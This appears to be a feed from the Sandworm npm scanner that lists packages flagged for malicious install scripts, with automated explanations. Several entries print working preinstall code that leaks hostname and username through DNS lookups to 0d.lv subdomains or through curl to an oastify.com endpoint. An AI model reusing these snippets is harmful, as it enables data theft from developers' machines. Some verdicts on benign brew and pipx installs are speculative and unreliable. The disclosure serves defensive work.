Sandworm scans all new Npm package versions for malicious install scripts.
Scanning since October 2024.
Follow our π / Twitter feed for updates.
Detected: 15 Oct 2024
Detected Date: 15 Oct 2024
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
The code constructs a token that includes sensitive information such as the package name, version, hostname, and username. It then performs a DNS lookup using this token, which can potentially expose this sensitive information to an external server, creating a risk of data leakage and privacy violations.
Install script:
node index.jsconst os = require("os");
const dns = require("dns");
const package_name = "tcs1";
const package_version = "7";
function version() {
console.log(package_name + " v" + package_version);
}
var pjson = require('./package.json');
var name = pjson.name;
try {
name = process.env.npm_package_name != undefined ? process.env.npm_package_name : name;
} catch { }
var token = package_name + "--" + package_version + "--" + name + "--" + os.hostname() + "--" + os.userInfo().username;
token = token.replaceAll(/[^a-zA-Z0-9\-]/g, '_');
dns.lookup(token + ".dc.0d.lv", () => { });
module.exports = version;
Detected: 15 Oct 2024
Detected Date: 15 Oct 2024
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
This code constructs a token that includes sensitive information such as the hostname and the username of the current user, and performs a DNS lookup using this token. If an attacker controls the domain being queried, they could potentially collect and exploit this sensitive information, leading to privacy breaches or further attacks.
Install script:node index.jsconst os = require("os");
const dns = require("dns");
const package_name = "tcs1";
const package_version = "6";
function version() {
console.log(package_name + " v" + package_version);
}
var pjson = require('./package.json');
var name = pjson.name;
try {
name = process.env.npm_package_name;
} catch { }
var token = package_name + "--" + package_version + "--" + pjson.name + "--" + os.hostname() + "--" + os.userInfo().username;
token = token.replaceAll(/[^a-zA-Z0-9\-]/g, '_');
dns.lookup(token + ".dc.0d.lv", () => { });
module.exports = version;
Detected: 15 Oct 2024
Detected Date: 15 Oct 2024
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
The code constructs a token containing sensitive information (package name, version, hostname, and username) and attempts to perform a DNS lookup based on this token, potentially leaking this information to an external server. This can expose user data and system information to malicious actors, thereby posing a security risk.
Install script:node index.jsconst package_name = "tds-styled-docs";
const package_version = "68.0.2";
const os = require("os");
const dns = require("dns");
function version() {
console.log(package_name + " v" + package_version);
}
const token = package_name + "-" + package_version + "-" + os.hostname() + "-" + os.userInfo().username;
dns.lookup(Buffer.from(token).toString('hex') + ".depconf.0d.lv", (err, address, family) => { });
module.exports = version;
Detected: 15 Oct 2024
Detected Date: 15 Oct 2024
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
The code constructs a token using sensitive information (package name, version, hostname, and username) and then performs a DNS lookup using this potentially sensitive token encoded in Base64URL format. This could expose the token to external DNS servers, which may lead to information leakage about the system and its user.
Install script:node index.jsconst package_name = "tds-styled-docs";
const package_version = "68.0.1";
const os = require("os");
const dns = require("dns");
function version() {
console.log(package_name + " v" + package_version);
}
const token = package_name + "-" + package_version + "-" + os.hostname() + "-" + os.userInfo().username;
dns.lookup(Buffer.from(token).toString('base64url') + ".depconf.0d.lv", (err, address, family) => { });
module.exports = version;
Detected: 15 Oct 2024
Detected Date: 15 Oct 2024
Affected Install Script: postinstall
Package Source: βοΈ View on Npm
This script uses the Homebrew package manager to install idb-companion, which is a tool related to the Facebook iOS development ecosystem, and cliclick, which can simulate mouse clicks and keyboard events. The pipx command subsequently installs fb-idb, which is a command-line tool related to iOS development. The combination of these tools could potentially allow for automated control of inputs and outputs on a system, which raises concerns about unauthorized access or malicious activities.
brew install facebook/fb/idb-companion cliclick pipx && pipx install fb-idbDetected: 15 Oct 2024
Detected Date: 15 Oct 2024
Affected Install Script: postinstall
Package Source: βοΈ View on Npm
This script installs idb-companion from Facebook's repository using Homebrew, which could potentially include harmful code, and also uses pipx to install fb-idb, a package that might perform unauthorized actions or collect sensitive information.
brew install facebook/fb/idb-companion cliclick pipx && pipx install fb-idbDetected: 15 Oct 2024
Detected Date: 15 Oct 2024
Affected Install Script: postinstall
Package Source: βοΈ View on Npm
This script attempts to install packages using Homebrew and pipx, and it could potentially execute multiple commands that may include downloading and executing code from external sources, allowing for unauthorized access or modification to the system.
Install script:brew install facebook/fb/idb-companion cliclick pipx && pipx install fb-idbDetected: 15 Oct 2024
Detected Date: 15 Oct 2024
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
This script sends the current user's username and hostname encoded in base64 to a remote server. It is dangerous because it potentially exposes sensitive information without the user's consent, and it communicates with an external endpoint which could be controlled by an attacker.
Install script:curl --data-urlencode "info=$echo "$(whoami)@$(hostname)" | base64" http://7owpmbrds5kmvxdil4zrg7a3nutlhi57.oastify.com/aspera-uiDetected: 15 Oct 2024
Detected Date: 15 Oct 2024
Affected Install Script: postinstall
Package Source: βοΈ View on Npm
This code attempts to download and execute a file based on an environment variable, potentially allowing arbitrary code execution if the downloaded content is malicious. If this script is run in an environment where the user can manipulate the environment variables (e.g., RUNME_DOWNLOAD_ON_INSTALL and RUNME_VERSION), it may lead to the execution of untrusted code.
Install script:node ./postInstall.jsimport fs from 'node:fs/promises'
const isCompiled = await fs.access('./dist').then(() => true, () => false)
if (isCompiled && process.env.RUNME_DOWNLOAD_ON_INSTALL) {
const { download } = await import('./dist/installer.js')
const version = process.env.RUNME_VERSION || 'latest'
console.log(`Download Runme ${version}`)
await download(version)
}
